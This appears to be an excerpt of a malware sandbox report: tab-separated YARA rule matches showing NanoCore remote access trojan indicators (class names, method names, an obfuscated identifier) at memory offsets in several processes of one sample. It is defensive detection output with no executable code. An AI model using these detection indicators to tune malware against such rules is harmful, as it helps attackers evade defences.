00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0x16fd:$i6: IClientLoggingHost 0x171c:$i7: IClientNetworkHost 0x1491:$s1: ClientPlugin 0x1768:$s1: ClientPlugin
00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x13a8:$a1: NanoCore.ClientPluginHost 0x13f2:$a2: NanoCore.ClientPlugin 0x13c2:$b9: IClientLoggingHost
00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x13f2:$x2: NanoCore.ClientPlugin 0x13a8:$x3: NanoCore.ClientPluginHost 0x1408:$i3: IClientNetwork 0x13c2:$i6: IClientLoggingHost 0x1185:$s1: ClientPlugin 0x13fb:$s1: ClientPlugin
0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4365b:$a1: NanoCore.ClientPluginHost 0x56dc9:$a1: NanoCore.ClientPluginHost 0x6fdad:$a1: NanoCore.ClientPluginHost 0x4361e:$a2: NanoCore.ClientPlugin 0x56d94:$a2: NanoCore.ClientPlugin 0x6fd78:$a2: NanoCore.ClientPlugin 0x439f2:$b1: get_BuilderSettings 0x5bd0f:$b1: get_BuilderSettings 0x74cf3:$b1: get_BuilderSettings 0x436a9:$b4: IClientAppHost 0x43a63:$b6: AddHostEntry 0x43ad2:$b7: LogClientException 0x5bc7e:$b7: LogClientException 0x74c62:$b7: LogClientException 0x43a47:$b8: PipeExists 0x43696:$b9: IClientLoggingHost 0x56de3:$b9: IClientLoggingHost 0x6fdc7:$b9: IClientLoggingHost
0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x435c5:$a: NanoCore 0x4361e:$a: NanoCore 0x4365b:$a: NanoCore 0x436d4:$a: NanoCore 0x56d7f:$a: NanoCore 0x56d94:$a: NanoCore 0x56dc9:$a: NanoCore 0x6fd63:$a: NanoCore 0x6fd78:$a: NanoCore 0x6fdad:$a: NanoCore 0x43627:$b: ClientPlugin 0x43664:$b: ClientPlugin 0x43f62:$b: ClientPlugin 0x43f6f:$b: ClientPlugin 0x56b3b:$b: ClientPlugin 0x56b56:$b: ClientPlugin 0x56b86:$b: ClientPlugin 0x56d9d:$b: ClientPlugin 0x56dd2:$b: ClientPlugin 0x6fb1f:$b: ClientPlugin 0x6fb3a:$b: ClientPlugin
00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x8bbf:$b9: IClientLoggingHost
00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork 0x8b95:$i5: IClientDataHost 0x8bbf:$i6: IClientLoggingHost 0x8bd2:$i7: IClientNetworkHost 0x8be5:$i9: IClientNameObjectCollection 0x8902:$s1: ClientPlugin 0x8b88:$s1: ClientPlugin
00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2cc3d:$a1: NanoCore.ClientPluginHost 0x2cbfd:$a2: NanoCore.ClientPlugin 0x2eb56:$b1: get_BuilderSettings 0x2ca59:$b2: ClientLoaderForm.resources 0x2e276:$b3: PluginCommand 0x2cc2e:$b4: IClientAppHost 0x370ae:$b5: GetBlockHash 0x2f1ae:$b6: AddHostEntry 0x32ea1:$b7: LogClientException 0x2f11b:$b8: PipeExists 0x2cc67:$b9: IClientLoggingHost
00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2c9a5:$a: NanoCore 0x2c9b5:$a: NanoCore 0x2cbe9:$a: NanoCore 0x2cbfd:$a: NanoCore 0x2cc3d:$a: NanoCore 0x2ca04:$b: ClientPlugin 0x2cc06:$b: ClientPlugin 0x2cc46:$b: ClientPlugin 0x2cb2b:$c: ProjectData 0x2d532:$d: DESCrypto 0x34efe:$e: KeepAlive 0x32eec:$g: LogClientMessage 0x2f0e7:$i: get_Connected 0x2d868:$j: #=q 0x2d898:$j: #=q 0x2d8b4:$j: #=q 0x2d8e4:$j: #=q 0x2d900:$j: #=q 0x2d91c:$j: #=q 0x2d94c:$j: #=q 0x2d968:$j: #=q
00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2cc3d:$x1: NanoCore.ClientPluginHost 0x2cc7a:$x2: IClientNetworkHost 0x307ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x2c9a5:$v1: NanoCore Client 0x2c9b5:$v1: NanoCore Client 0x2e276:$v2: PluginCommand 0x2e25e:$v3: CommandType
00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x555ef:$a1: NanoCore.ClientPluginHost 0x5fa1a:$a1: NanoCore.ClientPluginHost 0x6a9f7:$a1: NanoCore.ClientPluginHost 0x76799:$a1: NanoCore.ClientPluginHost 0x9b69d:$a1: NanoCore.ClientPluginHost 0xaaadd:$a1: NanoCore.ClientPluginHost 0x556d9:$a2: NanoCore.ClientPlugin 0x5faba:$a2: NanoCore.ClientPlugin 0x6a9ce:$a2: NanoCore.ClientPlugin 0x76770:$a2: NanoCore.ClientPlugin 0x9b674:$a2: NanoCore.ClientPlugin 0xaaab8:$a2: NanoCore.ClientPlugin 0xaaace:$b4: IClientAppHost 0x56f32:$b7: LogClientException 0x60810:$b7: LogClientException 0x78ae2:$b7: LogClientException 0xa06c8:$b7: LogClientException 0xaefbd:$b7: LogClientException 0x56545:$b8: PipeExists 0x55609:$b9: IClientLoggingHost 0x5fa34:$b9: IClientLoggingHost
00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x555ef:$a: NanoCore 0x556d9:$a: NanoCore 0x56550:$a: NanoCore 0x5f6fa:$a: NanoCore 0x5f75b:$a: NanoCore 0x5f79e:$a: NanoCore 0x5f7de:$a: NanoCore 0x5fa1a:$a: NanoCore 0x5faba:$a: NanoCore 0x60292:$a: NanoCore 0x60885:$a: NanoCore 0x609d6:$a: NanoCore 0x61830:$a: NanoCore 0x61a97:$a: NanoCore 0x61aac:$a: NanoCore 0x61acb:$a: NanoCore 0x6a9ce:$a: NanoCore 0x6a9f7:$a: NanoCore 0x76770:$a: NanoCore 0x76799:$a: NanoCore 0x9b65c:$a: NanoCore
0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6a0cd:$a1: NanoCore.ClientPluginHost 0x6a090:$a2: NanoCore.ClientPlugin 0x5b977:$b1: get_BuilderSettings 0x6a464:$b1: get_BuilderSettings 0x6a11b:$b4: IClientAppHost 0x6a4d5:$b6: AddHostEntry 0x5b8e6:$b7: LogClientException 0x6a544:$b7: LogClientException 0x6a4b9:$b8: PipeExists 0x6a108:$b9: IClientLoggingHost
0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6a037:$a: NanoCore 0x6a090:$a: NanoCore 0x6a0cd:$a: NanoCore 0x6a146:$a: NanoCore 0x6a099:$b: ClientPlugin 0x6a0d6:$b: ClientPlugin 0x6a9d4:$b: ClientPlugin 0x6a9e1:$b: ClientPlugin 0x60179:$e: KeepAlive 0x6a521:$g: LogClientMessage 0x6a4a1:$i: get_Connected 0x5a43d:$j: #=q 0x5a46d:$j: #=q 0x5a4a9:$j: #=q 0x5a4d1:$j: #=q 0x5a501:$j: #=q 0x5a531:$j: #=q 0x5a561:$j: #=q 0x5a591:$j: #=q 0x5a5ad:$j: #=q 0x5a5dd:$j: #=q
00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1d77f:$a1: NanoCore.ClientPluginHost 0x2d9a5:$a1: NanoCore.ClientPluginHost 0x3ab13:$a1: NanoCore.ClientPluginHost 0x44967:$a1: NanoCore.ClientPluginHost 0x4ba38:$a1: NanoCore.ClientPluginHost 0x51cc5:$a1: NanoCore.ClientPluginHost 0x5c2d7:$a1: NanoCore.ClientPluginHost 0x66707:$a1: NanoCore.ClientPluginHost 0x716ed:$a1: NanoCore.ClientPluginHost 0x7d497:$a1: NanoCore.ClientPluginHost 0x891e2:$a1: NanoCore.ClientPluginHost 0x1d75a:$a2: NanoCore.ClientPlugin 0x2d97f:$a2: NanoCore.ClientPlugin 0x3ab8f:$a2: NanoCore.ClientPlugin 0x449e3:$a2: NanoCore.ClientPlugin 0x4ba82:$a2: NanoCore.ClientPlugin 0x51d3f:$a2: NanoCore.ClientPlugin 0x5c3c1:$a2: NanoCore.ClientPlugin 0x667a7:$a2: NanoCore.ClientPlugin 0x716c4:$a2: NanoCore.ClientPlugin 0x7d46e:$a2: NanoCore.ClientPlugin
00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d75a:$a: NanoCore 0x1d77f:$a: NanoCore 0x1d7d8:$a: NanoCore 0x2d97f:$a: NanoCore 0x2d9a5:$a: NanoCore 0x2da01:$a: NanoCore 0x3a85b:$a: NanoCore 0x3a8b4:$a: NanoCore 0x3a8e7:$a: NanoCore 0x3ab13:$a: NanoCore 0x3ab8f:$a: NanoCore 0x3b1a8:$a: NanoCore 0x3b2f1:$a: NanoCore 0x3b7c5:$a: NanoCore 0x3baac:$a: NanoCore 0x3bac3:$a: NanoCore 0x44967:$a: NanoCore 0x449e3:$a: NanoCore 0x472c6:$a: NanoCore 0x4ba38:$a: NanoCore 0x4ba82:$a: NanoCore
00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6a149:$a1: NanoCore.ClientPluginHost 0x6a10c:$a2: NanoCore.ClientPlugin 0x5b9f3:$b1: get_BuilderSettings 0x6a4e0:$b1: get_BuilderSettings 0x6a197:$b4: IClientAppHost 0x6a551:$b6: AddHostEntry 0x5b962:$b7: LogClientException 0x6a5c0:$b7: LogClientException 0x6a535:$b8: PipeExists 0x6a184:$b9: IClientLoggingHost
00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6a0b3:$a: NanoCore 0x6a10c:$a: NanoCore 0x6a149:$a: NanoCore 0x6a1c2:$a: NanoCore 0x6a115:$b: ClientPlugin 0x6a152:$b: ClientPlugin 0x6aa50:$b: ClientPlugin 0x6aa5d:$b: ClientPlugin 0x601f5:$e: KeepAlive 0x6a59d:$g: LogClientMessage 0x6a51d:$i: get_Connected 0x5a4b9:$j: #=q 0x5a4e9:$j: #=q 0x5a525:$j: #=q 0x5a54d:$j: #=q 0x5a57d:$j: #=q 0x5a5ad:$j: #=q 0x5a5dd:$j: #=q 0x5a60d:$j: #=q 0x5a629:$j: #=q 0x5a659:$j: #=q
00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2e092d:$a1: NanoCore.ClientPluginHost 0x31334d:$a1: NanoCore.ClientPluginHost 0x2e08ed:$a2: NanoCore.ClientPlugin 0x31330d:$a2: NanoCore.ClientPlugin 0x2e2846:$b1: get_BuilderSettings 0x315266:$b1: get_BuilderSettings 0x2e0749:$b2: ClientLoaderForm.resources 0x313169:$b2: ClientLoaderForm.resources 0x2e1f66:$b3: PluginCommand 0x314986:$b3: PluginCommand 0x2e091e:$b4: IClientAppHost 0x31333e:$b4: IClientAppHost 0x2ead9e:$b5: GetBlockHash 0x31d7be:$b5: GetBlockHash 0x2e2e9e:$b6: AddHostEntry 0x3158be:$b6: AddHostEntry 0x2e6b91:$b7: LogClientException 0x3195b1:$b7: LogClientException 0x2e2e0b:$b8: PipeExists 0x31582b:$b8: PipeExists 0x2e0957:$b9: IClientLoggingHost
00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2e0695:$a: NanoCore 0x2e06a5:$a: NanoCore 0x2e08d9:$a: NanoCore 0x2e08ed:$a: NanoCore 0x2e092d:$a: NanoCore 0x3130b5:$a: NanoCore 0x3130c5:$a: NanoCore 0x3132f9:$a: NanoCore 0x31330d:$a: NanoCore 0x31334d:$a: NanoCore 0x2e06f4:$b: ClientPlugin 0x2e08f6:$b: ClientPlugin 0x2e0936:$b: ClientPlugin 0x313114:$b: ClientPlugin 0x313316:$b: ClientPlugin 0x313356:$b: ClientPlugin 0x21b32a:$c: ProjectData 0x28fb4a:$c: ProjectData 0x2e081b:$c: ProjectData 0x31323b:$c: ProjectData 0x2e1222:$d: DESCrypto
00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2e092d:$x1: NanoCore.ClientPluginHost 0x31334d:$x1: NanoCore.ClientPluginHost 0x2e096a:$x2: IClientNetworkHost 0x31338a:$x2: IClientNetworkHost 0x2e449d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x316ebd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x2e0695:$v1: NanoCore Client 0x2e06a5:$v1: NanoCore Client 0x3130b5:$v1: NanoCore Client 0x3130c5:$v1: NanoCore Client 0x2e1f66:$v2: PluginCommand 0x314986:$v2: PluginCommand 0x2e1f4e:$v3: CommandType 0x31496e:$v3: CommandType
00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2ceb9:$a1: NanoCore.ClientPluginHost 0x2ce7c:$a2: NanoCore.ClientPlugin 0x2d250:$b1: get_BuilderSettings 0x2cf07:$b4: IClientAppHost 0x2d2c1:$b6: AddHostEntry 0x2d330:$b7: LogClientException 0x2d2a5:$b8: PipeExists 0x2cef4:$b9: IClientLoggingHost
Process Memory Space: nD2ozRD7MN.exe PID: 1892	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 1892	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 1892	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x713e8:$a1: NanoCore.ClientPluginHost 0xa023c:$a1: NanoCore.ClientPluginHost 0x713a8:$a2: NanoCore.ClientPlugin 0xa01fc:$a2: NanoCore.ClientPlugin 0x72dcd:$b1: get_BuilderSettings 0xa2113:$b1: get_BuilderSettings 0x711a8:$b2: ClientLoaderForm.resources 0x9ffbd:$b2: ClientLoaderForm.resources 0x72516:$b3: PluginCommand 0xa1833:$b3: PluginCommand 0x713d9:$b4: IClientAppHost 0xa022d:$b4: IClientAppHost 0x7b2f2:$b5: GetBlockHash 0xaa666:$b5: GetBlockHash 0x73408:$b6: AddHostEntry 0x7e2d2:$b6: AddHostEntry 0x8a2ef:$b6: AddHostEntry 0xa276b:$b6: AddHostEntry 0xad88a:$b6: AddHostEntry 0x770f2:$b7: LogClientException 0x81e13:$b7: LogClientException
Process Memory Space: nD2ozRD7MN.exe PID: 1892	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x7113e:$a: NanoCore 0x7114e:$a: NanoCore 0x711c3:$a: NanoCore 0x711d2:$a: NanoCore 0x71394:$a: NanoCore 0x713a8:$a: NanoCore 0x713e8:$a: NanoCore 0x7bea2:$a: NanoCore 0x7beb4:$a: NanoCore 0x7bef0:$a: NanoCore 0x87ebf:$a: NanoCore 0x87ed1:$a: NanoCore 0x87f0d:$a: NanoCore 0x9ff09:$a: NanoCore 0x9ff19:$a: NanoCore 0x9ffd8:$a: NanoCore 0x9ffe7:$a: NanoCore 0xa01e8:$a: NanoCore 0xa01fc:$a: NanoCore 0xa023c:$a: NanoCore 0xab45a:$a: NanoCore
Process Memory Space: nD2ozRD7MN.exe PID: 1892	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x713e8:$x1: NanoCore.ClientPluginHost 0xa023c:$x1: NanoCore.ClientPluginHost 0x71425:$x2: IClientNetworkHost 0xa0279:$x2: IClientNetworkHost 0x749fe:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7f838:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8b855:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa3d6a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xaedf0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: nD2ozRD7MN.exe PID: 1892	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x7113e:$v1: NanoCore Client 0x7114e:$v1: NanoCore Client 0x711c3:$v1: NanoCore Client 0x711d2:$v1: NanoCore Client 0x9ff09:$v1: NanoCore Client 0x9ff19:$v1: NanoCore Client 0x9ffd8:$v1: NanoCore Client 0x9ffe7:$v1: NanoCore Client 0x72516:$v2: PluginCommand 0x7d414:$v2: PluginCommand 0x89431:$v2: PluginCommand 0xa1833:$v2: PluginCommand 0xac9cc:$v2: PluginCommand 0x17fdf:$v3: CommandType 0x1a4b4:$v3: CommandType 0x724fe:$v3: CommandType 0x7d3fe:$v3: CommandType 0x8941b:$v3: CommandType 0xa181b:$v3: CommandType 0xac9b6:$v3: CommandType
Process Memory Space: nD2ozRD7MN.exe PID: 5016	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 5016	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd1c:$a1: NanoCore.ClientPluginHost 0x9c11:$a1: NanoCore.ClientPluginHost 0x1daa6:$a1: NanoCore.ClientPluginHost 0x28f54:$a1: NanoCore.ClientPluginHost 0x2e11f:$a1: NanoCore.ClientPluginHost 0x3ac2e:$a1: NanoCore.ClientPluginHost 0x43a17:$a1: NanoCore.ClientPluginHost 0x507f5:$a1: NanoCore.ClientPluginHost 0x619fa:$a1: NanoCore.ClientPluginHost 0x741e4:$a1: NanoCore.ClientPluginHost 0x8247a:$a1: NanoCore.ClientPluginHost 0x9489e:$a1: NanoCore.ClientPluginHost 0xcdd5e:$a1: NanoCore.ClientPluginHost 0xd312a:$a1: NanoCore.ClientPluginHost 0x1073f2:$a1: NanoCore.ClientPluginHost 0x108dae:$a1: NanoCore.ClientPluginHost 0x115f6f:$a1: NanoCore.ClientPluginHost 0x128dad:$a1: NanoCore.ClientPluginHost 0xd96:$a2: NanoCore.ClientPlugin 0x9c8d:$a2: NanoCore.ClientPlugin 0x1da7d:$a2: NanoCore.ClientPlugin
Process Memory Space: nD2ozRD7MN.exe PID: 5016	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x78a:$a: NanoCore 0xd1c:$a: NanoCore 0xd96:$a: NanoCore 0x1b65:$a: NanoCore 0x1bd8:$a: NanoCore 0x82bc:$a: NanoCore 0x8338:$a: NanoCore 0x9c11:$a: NanoCore 0x9c8d:$a: NanoCore 0xb26d:$a: NanoCore 0xb2e1:$a: NanoCore 0xcbb2:$a: NanoCore 0xf38f:$a: NanoCore 0xf3a3:$a: NanoCore 0x1da65:$a: NanoCore 0x1da7d:$a: NanoCore 0x1daa6:$a: NanoCore 0x2289e:$a: NanoCore 0x228b4:$a: NanoCore 0x228db:$a: NanoCore 0x28f2b:$a: NanoCore
Process Memory Space: nD2ozRD7MN.exe PID: 5016	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x78a:$v1: NanoCore Client 0xf38f:$v1: NanoCore Client 0xf3a3:$v1: NanoCore Client 0x3e05f:$v1: NanoCore Client 0x10bbdf:$v1: NanoCore Client 0x10bc3c:$v1: NanoCore Client 0x10bccb:$v1: NanoCore Client 0x192f:$v2: PluginCommand 0xaaea2:$v2: PluginCommand 0xaf650:$v2: PluginCommand 0x107c64:$v2: PluginCommand 0xb32:$v3: CommandType 0x1990:$v3: CommandType 0x9a14:$v3: CommandType 0xb087:$v3: CommandType 0x1e300:$v3: CommandType 0x235f7:$v3: CommandType 0x299b3:$v3: CommandType 0x2be6e:$v3: CommandType 0x2ec7a:$v3: CommandType 0x32730:$v3: CommandType
Process Memory Space: nD2ozRD7MN.exe PID: 7288	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 7288	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 7288	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2fa5:$a1: NanoCore.ClientPluginHost 0x4d015:$a1: NanoCore.ClientPluginHost 0x2f65:$a2: NanoCore.ClientPlugin 0x4cfd5:$a2: NanoCore.ClientPlugin 0x4e7c:$b1: get_BuilderSettings 0x4eeec:$b1: get_BuilderSettings 0x2d26:$b2: ClientLoaderForm.resources 0x4cd96:$b2: ClientLoaderForm.resources 0x459c:$b3: PluginCommand 0x4e60c:$b3: PluginCommand 0x2f96:$b4: IClientAppHost 0x4d006:$b4: IClientAppHost 0xd3cf:$b5: GetBlockHash 0x5743f:$b5: GetBlockHash 0x54d4:$b6: AddHostEntry 0x105f3:$b6: AddHostEntry 0x4f544:$b6: AddHostEntry 0x5a663:$b6: AddHostEntry 0x666a3:$b6: AddHostEntry 0x91c7:$b7: LogClientException 0x14134:$b7: LogClientException
Process Memory Space: nD2ozRD7MN.exe PID: 7288	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2c72:$a: NanoCore 0x2c82:$a: NanoCore 0x2d41:$a: NanoCore 0x2d50:$a: NanoCore 0x2f51:$a: NanoCore 0x2f65:$a: NanoCore 0x2fa5:$a: NanoCore 0xe1c3:$a: NanoCore 0xe1d5:$a: NanoCore 0xe211:$a: NanoCore 0x4cce2:$a: NanoCore 0x4ccf2:$a: NanoCore 0x4cdb1:$a: NanoCore 0x4cdc0:$a: NanoCore 0x4cfc1:$a: NanoCore 0x4cfd5:$a: NanoCore 0x4d015:$a: NanoCore 0x58233:$a: NanoCore 0x58245:$a: NanoCore 0x58281:$a: NanoCore 0x64273:$a: NanoCore
Process Memory Space: nD2ozRD7MN.exe PID: 7288	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2fa5:$x1: NanoCore.ClientPluginHost 0x4d015:$x1: NanoCore.ClientPluginHost 0x2fe2:$x2: IClientNetworkHost 0x4d052:$x2: IClientNetworkHost 0x6ad3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x11b59:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x50b43:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5bbc9:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x67c09:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: nD2ozRD7MN.exe PID: 7288	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x2c72:$v1: NanoCore Client 0x2c82:$v1: NanoCore Client 0x2d41:$v1: NanoCore Client 0x2d50:$v1: NanoCore Client 0x4cce2:$v1: NanoCore Client 0x4ccf2:$v1: NanoCore Client 0x4cdb1:$v1: NanoCore Client 0x4cdc0:$v1: NanoCore Client 0x459c:$v2: PluginCommand 0xf735:$v2: PluginCommand 0x4e60c:$v2: PluginCommand 0x597a5:$v2: PluginCommand 0x657e5:$v2: PluginCommand 0x4584:$v3: CommandType 0xf71f:$v3: CommandType 0x4e5f4:$v3: CommandType 0x5978f:$v3: CommandType 0x657cf:$v3: CommandType
Process Memory Space: nD2ozRD7MN.exe PID: 7456	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: nD2ozRD7MN.exe PID: 7456	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x190ae:$a1: NanoCore.ClientPluginHost 0x24cb0:$a1: NanoCore.ClientPluginHost 0x3c41c:$a1: NanoCore.ClientPluginHost 0x19071:$a2: NanoCore.ClientPlugin 0x24c70:$a2: NanoCore.ClientPlugin 0x3c3df:$a2: NanoCore.ClientPlugin 0x127bd:$b1: get_BuilderSettings 0x26b87:$b1: get_BuilderSettings 0x3c796:$b1: get_BuilderSettings 0x24a31:$b2: ClientLoaderForm.resources 0x262a7:$b3: PluginCommand 0x190fc:$b4: IClientAppHost 0x24ca1:$b4: IClientAppHost 0x3c46a:$b4: IClientAppHost 0x2f0da:$b5: GetBlockHash 0x1940f:$b6: AddHostEntry 0x271df:$b6: AddHostEntry 0x322fe:$b6: AddHostEntry 0x3c807:$b6: AddHostEntry 0x1272c:$b7: LogClientException 0x2aed2:$b7: LogClientException
Process Memory Space: nD2ozRD7MN.exe PID: 7456	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x259f:$a: NanoCore 0x25fc:$a: NanoCore 0x267b:$a: NanoCore 0x19018:$a: NanoCore 0x19071:$a: NanoCore 0x190ae:$a: NanoCore 0x19127:$a: NanoCore 0x198b5:$a: NanoCore 0x19908:$a: NanoCore 0x19941:$a: NanoCore 0x199b4:$a: NanoCore 0x1a5b6:$a: NanoCore 0x1a70e:$a: NanoCore 0x1a724:$a: NanoCore 0x1a978:$a: NanoCore 0x1ddfc:$a: NanoCore 0x1de10:$a: NanoCore 0x1f399:$a: NanoCore 0x2497d:$a: NanoCore 0x2498d:$a: NanoCore 0x24a4c:$a: NanoCore
